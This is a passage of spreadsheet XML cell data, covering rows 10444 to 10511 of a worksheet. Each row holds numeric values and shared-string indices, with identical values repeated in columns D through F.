        <v>9997</v>
      </c>
      <c r="D10444" s="2">
        <v>1.0</v>
      </c>
      <c r="E10444" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10444" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10445" ht="15.75" customHeight="1">
      <c r="A10445" s="1">
        <v>7848.0</v>
      </c>
      <c r="B10445" s="2">
        <v>5.2338407E7</v>
      </c>
      <c r="C10445" s="2" t="s">
        <v>9998</v>
      </c>
      <c r="D10445" s="2">
        <v>1.0</v>
      </c>
      <c r="E10445" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10445" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10446" ht="15.75" customHeight="1">
      <c r="A10446" s="1">
        <v>7864.0</v>
      </c>
      <c r="B10446" s="2">
        <v>5.238784E7</v>
      </c>
      <c r="C10446" s="2" t="s">
        <v>9999</v>
      </c>
      <c r="D10446" s="2">
        <v>1.0</v>
      </c>
      <c r="E10446" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10446" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10447" ht="15.75" customHeight="1">
      <c r="A10447" s="1">
        <v>7923.0</v>
      </c>
      <c r="B10447" s="2">
        <v>5.2561206E7</v>
      </c>
      <c r="C10447" s="2" t="s">
        <v>10000</v>
      </c>
      <c r="D10447" s="2">
        <v>1.0</v>
      </c>
      <c r="E10447" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10447" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10448" ht="15.75" customHeight="1">
      <c r="A10448" s="1">
        <v>8235.0</v>
      </c>
      <c r="B10448" s="2">
        <v>5335551.0</v>
      </c>
      <c r="C10448" s="2" t="s">
        <v>10001</v>
      </c>
      <c r="D10448" s="2">
        <v>1.0</v>
      </c>
      <c r="E10448" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10448" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10449" ht="15.75" customHeight="1">
      <c r="A10449" s="1">
        <v>8241.0</v>
      </c>
      <c r="B10449" s="2">
        <v>5.3362619E7</v>
      </c>
      <c r="C10449" s="2" t="s">
        <v>10002</v>
      </c>
      <c r="D10449" s="2">
        <v>1.0</v>
      </c>
      <c r="E10449" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10449" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10450" ht="15.75" customHeight="1">
      <c r="A10450" s="1">
        <v>8484.0</v>
      </c>
      <c r="B10450" s="2">
        <v>5.4040025E7</v>
      </c>
      <c r="C10450" s="2" t="s">
        <v>10003</v>
      </c>
      <c r="D10450" s="2">
        <v>1.0</v>
      </c>
      <c r="E10450" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10450" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10451" ht="15.75" customHeight="1">
      <c r="A10451" s="1">
        <v>8763.0</v>
      </c>
      <c r="B10451" s="2">
        <v>5.4575747E7</v>
      </c>
      <c r="C10451" s="2" t="s">
        <v>10004</v>
      </c>
      <c r="D10451" s="2">
        <v>1.0</v>
      </c>
      <c r="E10451" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10451" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10452" ht="15.75" customHeight="1">
      <c r="A10452" s="1">
        <v>8788.0</v>
      </c>
      <c r="B10452" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C10452" s="2" t="s">
        <v>10005</v>
      </c>
      <c r="D10452" s="2">
        <v>1.0</v>
      </c>
      <c r="E10452" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10452" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10453" ht="15.75" customHeight="1">
      <c r="A10453" s="1">
        <v>8811.0</v>
      </c>
      <c r="B10453" s="2">
        <v>5.4628587E7</v>
      </c>
      <c r="C10453" s="2" t="s">
        <v>10006</v>
      </c>
      <c r="D10453" s="2">
        <v>1.0</v>
      </c>
      <c r="E10453" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10453" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10454" ht="15.75" customHeight="1">
      <c r="A10454" s="1">
        <v>8955.0</v>
      </c>
      <c r="B10454" s="2">
        <v>5.4924949E7</v>
      </c>
      <c r="C10454" s="2" t="s">
        <v>10007</v>
      </c>
      <c r="D10454" s="2">
        <v>1.0</v>
      </c>
      <c r="E10454" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10454" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10455" ht="15.75" customHeight="1">
      <c r="A10455" s="1">
        <v>9109.0</v>
      </c>
      <c r="B10455" s="2">
        <v>5.5185822E7</v>
      </c>
      <c r="C10455" s="2" t="s">
        <v>10008</v>
      </c>
      <c r="D10455" s="2">
        <v>1.0</v>
      </c>
      <c r="E10455" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10455" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10456" ht="15.75" customHeight="1">
      <c r="A10456" s="1">
        <v>9229.0</v>
      </c>
      <c r="B10456" s="2">
        <v>5.5449654E7</v>
      </c>
      <c r="C10456" s="2" t="s">
        <v>10009</v>
      </c>
      <c r="D10456" s="2">
        <v>1.0</v>
      </c>
      <c r="E10456" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10456" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10457" ht="15.75" customHeight="1">
      <c r="A10457" s="1">
        <v>9236.0</v>
      </c>
      <c r="B10457" s="2">
        <v>5.5462021E7</v>
      </c>
      <c r="C10457" s="2" t="s">
        <v>10010</v>
      </c>
      <c r="D10457" s="2">
        <v>1.0</v>
      </c>
      <c r="E10457" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10457" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10458" ht="15.75" customHeight="1">
      <c r="A10458" s="1">
        <v>9265.0</v>
      </c>
      <c r="B10458" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C10458" s="2" t="s">
        <v>10011</v>
      </c>
      <c r="D10458" s="2">
        <v>1.0</v>
      </c>
      <c r="E10458" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10458" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10459" ht="15.75" customHeight="1">
      <c r="A10459" s="1">
        <v>9288.0</v>
      </c>
      <c r="B10459" s="2">
        <v>5.5536796E7</v>
      </c>
      <c r="C10459" s="2" t="s">
        <v>10012</v>
      </c>
      <c r="D10459" s="2">
        <v>1.0</v>
      </c>
      <c r="E10459" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10459" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10460" ht="15.75" customHeight="1">
      <c r="A10460" s="1">
        <v>9296.0</v>
      </c>
      <c r="B10460" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C10460" s="2" t="s">
        <v>10013</v>
      </c>
      <c r="D10460" s="2">
        <v>1.0</v>
      </c>
      <c r="E10460" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10460" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10461" ht="15.75" customHeight="1">
      <c r="A10461" s="1">
        <v>9666.0</v>
      </c>
      <c r="B10461" s="2">
        <v>5.6307237E7</v>
      </c>
      <c r="C10461" s="2" t="s">
        <v>10014</v>
      </c>
      <c r="D10461" s="2">
        <v>1.0</v>
      </c>
      <c r="E10461" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10461" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10462" ht="15.75" customHeight="1">
      <c r="A10462" s="1">
        <v>9730.0</v>
      </c>
      <c r="B10462" s="2">
        <v>5.6443848E7</v>
      </c>
      <c r="C10462" s="2" t="s">
        <v>10015</v>
      </c>
      <c r="D10462" s="2">
        <v>1.0</v>
      </c>
      <c r="E10462" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10462" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10463" ht="15.75" customHeight="1">
      <c r="A10463" s="1">
        <v>9759.0</v>
      </c>
      <c r="B10463" s="2">
        <v>5.6493986E7</v>
      </c>
      <c r="C10463" s="2" t="s">
        <v>10016</v>
      </c>
      <c r="D10463" s="2">
        <v>1.0</v>
      </c>
      <c r="E10463" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10463" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10464" ht="15.75" customHeight="1">
      <c r="A10464" s="1">
        <v>9763.0</v>
      </c>
      <c r="B10464" s="2">
        <v>5.6498877E7</v>
      </c>
      <c r="C10464" s="2" t="s">
        <v>10017</v>
      </c>
      <c r="D10464" s="2">
        <v>1.0</v>
      </c>
      <c r="E10464" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10464" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10465" ht="15.75" customHeight="1">
      <c r="A10465" s="1">
        <v>10506.0</v>
      </c>
      <c r="B10465" s="2">
        <v>1.1423041E7</v>
      </c>
      <c r="C10465" s="2" t="s">
        <v>10018</v>
      </c>
      <c r="D10465" s="2">
        <v>1.0</v>
      </c>
      <c r="E10465" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10465" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10466" ht="15.75" customHeight="1">
      <c r="A10466" s="1">
        <v>10580.0</v>
      </c>
      <c r="B10466" s="2">
        <v>1.3173638E7</v>
      </c>
      <c r="C10466" s="2" t="s">
        <v>10019</v>
      </c>
      <c r="D10466" s="2">
        <v>1.0</v>
      </c>
      <c r="E10466" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10466" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10467" ht="15.75" customHeight="1">
      <c r="A10467" s="1">
        <v>10585.0</v>
      </c>
      <c r="B10467" s="2">
        <v>1.3194782E7</v>
      </c>
      <c r="C10467" s="2" t="s">
        <v>10020</v>
      </c>
      <c r="D10467" s="2">
        <v>1.0</v>
      </c>
      <c r="E10467" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10467" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10468" ht="15.75" customHeight="1">
      <c r="A10468" s="1">
        <v>10620.0</v>
      </c>
      <c r="B10468" s="2">
        <v>1.3772664E7</v>
      </c>
      <c r="C10468" s="2" t="s">
        <v>10021</v>
      </c>
      <c r="D10468" s="2">
        <v>1.0</v>
      </c>
      <c r="E10468" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10468" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10469" ht="15.75" customHeight="1">
      <c r="A10469" s="1">
        <v>10656.0</v>
      </c>
      <c r="B10469" s="2">
        <v>1.4201393E7</v>
      </c>
      <c r="C10469" s="2" t="s">
        <v>10022</v>
      </c>
      <c r="D10469" s="2">
        <v>1.0</v>
      </c>
      <c r="E10469" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10469" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10470" ht="15.75" customHeight="1">
      <c r="A10470" s="1">
        <v>10766.0</v>
      </c>
      <c r="B10470" s="2">
        <v>1.5596858E7</v>
      </c>
      <c r="C10470" s="2" t="s">
        <v>10023</v>
      </c>
      <c r="D10470" s="2">
        <v>1.0</v>
      </c>
      <c r="E10470" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10470" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10471" ht="15.75" customHeight="1">
      <c r="A10471" s="1">
        <v>10865.0</v>
      </c>
      <c r="B10471" s="2">
        <v>1.6394283E7</v>
      </c>
      <c r="C10471" s="2" t="s">
        <v>10024</v>
      </c>
      <c r="D10471" s="2">
        <v>1.0</v>
      </c>
      <c r="E10471" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10471" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10472" ht="15.75" customHeight="1">
      <c r="A10472" s="1">
        <v>11101.0</v>
      </c>
      <c r="B10472" s="2">
        <v>1.8594561E7</v>
      </c>
      <c r="C10472" s="2" t="s">
        <v>10025</v>
      </c>
      <c r="D10472" s="2">
        <v>1.0</v>
      </c>
      <c r="E10472" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10472" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10473" ht="15.75" customHeight="1">
      <c r="A10473" s="1">
        <v>11134.0</v>
      </c>
      <c r="B10473" s="2">
        <v>1.9184967E7</v>
      </c>
      <c r="C10473" s="2" t="s">
        <v>10026</v>
      </c>
      <c r="D10473" s="2">
        <v>1.0</v>
      </c>
      <c r="E10473" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10473" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10474" ht="15.75" customHeight="1">
      <c r="A10474" s="1">
        <v>11331.0</v>
      </c>
      <c r="B10474" s="2">
        <v>2.1164401E7</v>
      </c>
      <c r="C10474" s="2" t="s">
        <v>10027</v>
      </c>
      <c r="D10474" s="2">
        <v>1.0</v>
      </c>
      <c r="E10474" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10474" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10475" ht="15.75" customHeight="1">
      <c r="A10475" s="1">
        <v>11529.0</v>
      </c>
      <c r="B10475" s="2">
        <v>2.2509568E7</v>
      </c>
      <c r="C10475" s="2" t="s">
        <v>10028</v>
      </c>
      <c r="D10475" s="2">
        <v>1.0</v>
      </c>
      <c r="E10475" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10475" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10476" ht="15.75" customHeight="1">
      <c r="A10476" s="1">
        <v>11563.0</v>
      </c>
      <c r="B10476" s="2">
        <v>2.2744706E7</v>
      </c>
      <c r="C10476" s="2" t="s">
        <v>10029</v>
      </c>
      <c r="D10476" s="2">
        <v>1.0</v>
      </c>
      <c r="E10476" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10476" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10477" ht="15.75" customHeight="1">
      <c r="A10477" s="1">
        <v>11571.0</v>
      </c>
      <c r="B10477" s="2">
        <v>2.2773596E7</v>
      </c>
      <c r="C10477" s="2" t="s">
        <v>10030</v>
      </c>
      <c r="D10477" s="2">
        <v>1.0</v>
      </c>
      <c r="E10477" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10477" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10478" ht="15.75" customHeight="1">
      <c r="A10478" s="1">
        <v>11742.0</v>
      </c>
      <c r="B10478" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C10478" s="2" t="s">
        <v>10031</v>
      </c>
      <c r="D10478" s="2">
        <v>1.0</v>
      </c>
      <c r="E10478" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10478" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10479" ht="15.75" customHeight="1">
      <c r="A10479" s="1">
        <v>11972.0</v>
      </c>
      <c r="B10479" s="2">
        <v>2.5733744E7</v>
      </c>
      <c r="C10479" s="2" t="s">
        <v>10032</v>
      </c>
      <c r="D10479" s="2">
        <v>1.0</v>
      </c>
      <c r="E10479" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10479" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10480" ht="15.75" customHeight="1">
      <c r="A10480" s="1">
        <v>12060.0</v>
      </c>
      <c r="B10480" s="2">
        <v>2.6513043E7</v>
      </c>
      <c r="C10480" s="2" t="s">
        <v>10033</v>
      </c>
      <c r="D10480" s="2">
        <v>1.0</v>
      </c>
      <c r="E10480" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10480" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10481" ht="15.75" customHeight="1">
      <c r="A10481" s="1">
        <v>12317.0</v>
      </c>
      <c r="B10481" s="2">
        <v>2.8437324E7</v>
      </c>
      <c r="C10481" s="2" t="s">
        <v>10034</v>
      </c>
      <c r="D10481" s="2">
        <v>1.0</v>
      </c>
      <c r="E10481" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10481" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10482" ht="15.75" customHeight="1">
      <c r="A10482" s="1">
        <v>12527.0</v>
      </c>
      <c r="B10482" s="2">
        <v>2.9741832E7</v>
      </c>
      <c r="C10482" s="2" t="s">
        <v>10035</v>
      </c>
      <c r="D10482" s="2">
        <v>1.0</v>
      </c>
      <c r="E10482" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10482" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10483" ht="15.75" customHeight="1">
      <c r="A10483" s="1">
        <v>12682.0</v>
      </c>
      <c r="B10483" s="2">
        <v>3.0625967E7</v>
      </c>
      <c r="C10483" s="2" t="s">
        <v>10036</v>
      </c>
      <c r="D10483" s="2">
        <v>1.0</v>
      </c>
      <c r="E10483" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10483" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10484" ht="15.75" customHeight="1">
      <c r="A10484" s="1">
        <v>12790.0</v>
      </c>
      <c r="B10484" s="2">
        <v>3.1373862E7</v>
      </c>
      <c r="C10484" s="2" t="s">
        <v>10037</v>
      </c>
      <c r="D10484" s="2">
        <v>1.0</v>
      </c>
      <c r="E10484" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10484" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10485" ht="15.75" customHeight="1">
      <c r="A10485" s="1">
        <v>12808.0</v>
      </c>
      <c r="B10485" s="2">
        <v>3.1562532E7</v>
      </c>
      <c r="C10485" s="2" t="s">
        <v>10038</v>
      </c>
      <c r="D10485" s="2">
        <v>1.0</v>
      </c>
      <c r="E10485" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10485" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10486" ht="15.75" customHeight="1">
      <c r="A10486" s="1">
        <v>12933.0</v>
      </c>
      <c r="B10486" s="2">
        <v>3.2356518E7</v>
      </c>
      <c r="C10486" s="2" t="s">
        <v>10039</v>
      </c>
      <c r="D10486" s="2">
        <v>1.0</v>
      </c>
      <c r="E10486" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10486" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10487" ht="15.75" customHeight="1">
      <c r="A10487" s="1">
        <v>13057.0</v>
      </c>
      <c r="B10487" s="2">
        <v>3.3215081E7</v>
      </c>
      <c r="C10487" s="2" t="s">
        <v>10040</v>
      </c>
      <c r="D10487" s="2">
        <v>1.0</v>
      </c>
      <c r="E10487" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10487" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10488" ht="15.75" customHeight="1">
      <c r="A10488" s="1">
        <v>13067.0</v>
      </c>
      <c r="B10488" s="2">
        <v>3.3320987E7</v>
      </c>
      <c r="C10488" s="2" t="s">
        <v>10041</v>
      </c>
      <c r="D10488" s="2">
        <v>1.0</v>
      </c>
      <c r="E10488" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10488" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10489" ht="15.75" customHeight="1">
      <c r="A10489" s="1">
        <v>13219.0</v>
      </c>
      <c r="B10489" s="2">
        <v>3.4219309E7</v>
      </c>
      <c r="C10489" s="2" t="s">
        <v>10042</v>
      </c>
      <c r="D10489" s="2">
        <v>1.0</v>
      </c>
      <c r="E10489" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10489" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10490" ht="15.75" customHeight="1">
      <c r="A10490" s="1">
        <v>13257.0</v>
      </c>
      <c r="B10490" s="2">
        <v>3.4305086E7</v>
      </c>
      <c r="C10490" s="2" t="s">
        <v>10043</v>
      </c>
      <c r="D10490" s="2">
        <v>1.0</v>
      </c>
      <c r="E10490" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10490" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10491" ht="15.75" customHeight="1">
      <c r="A10491" s="1">
        <v>13365.0</v>
      </c>
      <c r="B10491" s="2">
        <v>3.4805694E7</v>
      </c>
      <c r="C10491" s="2" t="s">
        <v>10044</v>
      </c>
      <c r="D10491" s="2">
        <v>1.0</v>
      </c>
      <c r="E10491" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10491" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10492" ht="15.75" customHeight="1">
      <c r="A10492" s="1">
        <v>13457.0</v>
      </c>
      <c r="B10492" s="2">
        <v>3.5200076E7</v>
      </c>
      <c r="C10492" s="2" t="s">
        <v>10045</v>
      </c>
      <c r="D10492" s="2">
        <v>1.0</v>
      </c>
      <c r="E10492" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10492" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10493" ht="15.75" customHeight="1">
      <c r="A10493" s="1">
        <v>13676.0</v>
      </c>
      <c r="B10493" s="2">
        <v>3.6050841E7</v>
      </c>
      <c r="C10493" s="2" t="s">
        <v>10046</v>
      </c>
      <c r="D10493" s="2">
        <v>1.0</v>
      </c>
      <c r="E10493" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10493" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10494" ht="15.75" customHeight="1">
      <c r="A10494" s="1">
        <v>14248.0</v>
      </c>
      <c r="B10494" s="2">
        <v>3.8364528E7</v>
      </c>
      <c r="C10494" s="2" t="s">
        <v>10047</v>
      </c>
      <c r="D10494" s="2">
        <v>1.0</v>
      </c>
      <c r="E10494" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10494" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10495" ht="15.75" customHeight="1">
      <c r="A10495" s="1">
        <v>14273.0</v>
      </c>
      <c r="B10495" s="2">
        <v>3.8441704E7</v>
      </c>
      <c r="C10495" s="2" t="s">
        <v>10048</v>
      </c>
      <c r="D10495" s="2">
        <v>1.0</v>
      </c>
      <c r="E10495" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10495" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10496" ht="15.75" customHeight="1">
      <c r="A10496" s="1">
        <v>14486.0</v>
      </c>
      <c r="B10496" s="2">
        <v>3.9590387E7</v>
      </c>
      <c r="C10496" s="2" t="s">
        <v>10049</v>
      </c>
      <c r="D10496" s="2">
        <v>1.0</v>
      </c>
      <c r="E10496" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10496" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10497" ht="15.75" customHeight="1">
      <c r="A10497" s="1">
        <v>14538.0</v>
      </c>
      <c r="B10497" s="2">
        <v>3.9877157E7</v>
      </c>
      <c r="C10497" s="2" t="s">
        <v>10050</v>
      </c>
      <c r="D10497" s="2">
        <v>1.0</v>
      </c>
      <c r="E10497" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10497" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10498" ht="15.75" customHeight="1">
      <c r="A10498" s="1">
        <v>14647.0</v>
      </c>
      <c r="B10498" s="2">
        <v>4.0365997E7</v>
      </c>
      <c r="C10498" s="2" t="s">
        <v>10051</v>
      </c>
      <c r="D10498" s="2">
        <v>1.0</v>
      </c>
      <c r="E10498" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10498" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10499" ht="15.75" customHeight="1">
      <c r="A10499" s="1">
        <v>14685.0</v>
      </c>
      <c r="B10499" s="2">
        <v>4.0510218E7</v>
      </c>
      <c r="C10499" s="2" t="s">
        <v>10052</v>
      </c>
      <c r="D10499" s="2">
        <v>1.0</v>
      </c>
      <c r="E10499" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10499" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10500" ht="15.75" customHeight="1">
      <c r="A10500" s="1">
        <v>14743.0</v>
      </c>
      <c r="B10500" s="2">
        <v>4.0712355E7</v>
      </c>
      <c r="C10500" s="2" t="s">
        <v>10053</v>
      </c>
      <c r="D10500" s="2">
        <v>1.0</v>
      </c>
      <c r="E10500" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10500" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10501" ht="15.75" customHeight="1">
      <c r="A10501" s="1">
        <v>14915.0</v>
      </c>
      <c r="B10501" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C10501" s="2" t="s">
        <v>10054</v>
      </c>
      <c r="D10501" s="2">
        <v>1.0</v>
      </c>
      <c r="E10501" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10501" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10502" ht="15.75" customHeight="1">
      <c r="A10502" s="1">
        <v>15176.0</v>
      </c>
      <c r="B10502" s="2">
        <v>4.2016328E7</v>
      </c>
      <c r="C10502" s="2" t="s">
        <v>10055</v>
      </c>
      <c r="D10502" s="2">
        <v>1.0</v>
      </c>
      <c r="E10502" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10502" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10503" ht="15.75" customHeight="1">
      <c r="A10503" s="1">
        <v>15318.0</v>
      </c>
      <c r="B10503" s="2">
        <v>4.2513962E7</v>
      </c>
      <c r="C10503" s="2" t="s">
        <v>10056</v>
      </c>
      <c r="D10503" s="2">
        <v>1.0</v>
      </c>
      <c r="E10503" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10503" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10504" ht="15.75" customHeight="1">
      <c r="A10504" s="1">
        <v>15405.0</v>
      </c>
      <c r="B10504" s="2">
        <v>4.2832816E7</v>
      </c>
      <c r="C10504" s="2" t="s">
        <v>10057</v>
      </c>
      <c r="D10504" s="2">
        <v>1.0</v>
      </c>
      <c r="E10504" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10504" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10505" ht="15.75" customHeight="1">
      <c r="A10505" s="1">
        <v>15891.0</v>
      </c>
      <c r="B10505" s="2">
        <v>4.4562673E7</v>
      </c>
      <c r="C10505" s="2" t="s">
        <v>10058</v>
      </c>
      <c r="D10505" s="2">
        <v>1.0</v>
      </c>
      <c r="E10505" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10505" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10506" ht="15.75" customHeight="1">
      <c r="A10506" s="1">
        <v>15969.0</v>
      </c>
      <c r="B10506" s="2">
        <v>4.4801592E7</v>
      </c>
      <c r="C10506" s="2" t="s">
        <v>10059</v>
      </c>
      <c r="D10506" s="2">
        <v>1.0</v>
      </c>
      <c r="E10506" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10506" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10507" ht="15.75" customHeight="1">
      <c r="A10507" s="1">
        <v>16124.0</v>
      </c>
      <c r="B10507" s="2">
        <v>4.5490591E7</v>
      </c>
      <c r="C10507" s="2" t="s">
        <v>10060</v>
      </c>
      <c r="D10507" s="2">
        <v>1.0</v>
      </c>
      <c r="E10507" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10507" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10508" ht="15.75" customHeight="1">
      <c r="A10508" s="1">
        <v>16140.0</v>
      </c>
      <c r="B10508" s="2">
        <v>4.5546505E7</v>
      </c>
      <c r="C10508" s="2" t="s">
        <v>10061</v>
      </c>
      <c r="D10508" s="2">
        <v>1.0</v>
      </c>
      <c r="E10508" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10508" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10509" ht="15.75" customHeight="1">
      <c r="A10509" s="1">
        <v>16365.0</v>
      </c>
      <c r="B10509" s="2">
        <v>4.6135812E7</v>
      </c>
      <c r="C10509" s="2" t="s">
        <v>10062</v>
      </c>
      <c r="D10509" s="2">
        <v>1.0</v>
      </c>
      <c r="E10509" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10509" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10510" ht="15.75" customHeight="1">
      <c r="A10510" s="1">
        <v>16368.0</v>
      </c>
      <c r="B10510" s="2">
        <v>4.6145102E7</v>
      </c>
      <c r="C10510" s="2" t="s">
        <v>10063</v>
      </c>
      <c r="D10510" s="2">
        <v>1.0</v>
      </c>
      <c r="E10510" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10510" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10511" ht="15.75" customHeight="1">
      <c r="A10511" s="1">
        <v>16399.0</v>
      </c>
      <c r="B10511" s="2">
        <v>4.6286023E7</v>
      </c>
